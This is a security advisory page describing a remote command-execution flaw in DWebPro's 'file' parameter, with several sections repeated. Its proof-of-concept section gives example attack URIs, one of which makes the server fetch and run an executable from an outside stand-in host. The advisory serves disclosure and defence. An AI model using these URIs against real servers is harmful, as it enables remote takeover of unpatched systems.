DWebPro 'file' Parameter Remote Command Execution Vulnerability
BID:36714
Info
DWebPro 'file' Parameter Remote Command Execution Vulnerability
| Bugtraq ID: | 36714 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 16 2009 12:00AM |
| Updated: | Oct 19 2009 03:48PM |
| Credit: | Rafael Sousa |
| Vulnerable: |
DWebPro DWebPro 0 |
| Not Vulnerable: | |
Discussion
DWebPro 'file' Parameter Remote Command Execution Vulnerability
DWebPro is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.
Successful attacks can compromise the application and possibly the computer.
We don't know which versions are affected. We will update this BID as more information emerges.
DWebPro is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.
Successful attacks can compromise the application and possibly the computer.
We don't know which versions are affected. We will update this BID as more information emerges.
Exploit / POC
DWebPro 'file' Parameter Remote Command Execution Vulnerability
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt
http://www.example.com:8080/dwebpro/start?file=http://www.example2.com/somefile.exe
An attacker can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt
http://www.example.com:8080/dwebpro/start?file=http://www.example2.com/somefile.exe
Solution / Fix
DWebPro 'file' Parameter Remote Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
DWebPro 'file' Parameter Remote Command Execution Vulnerability
References:
References: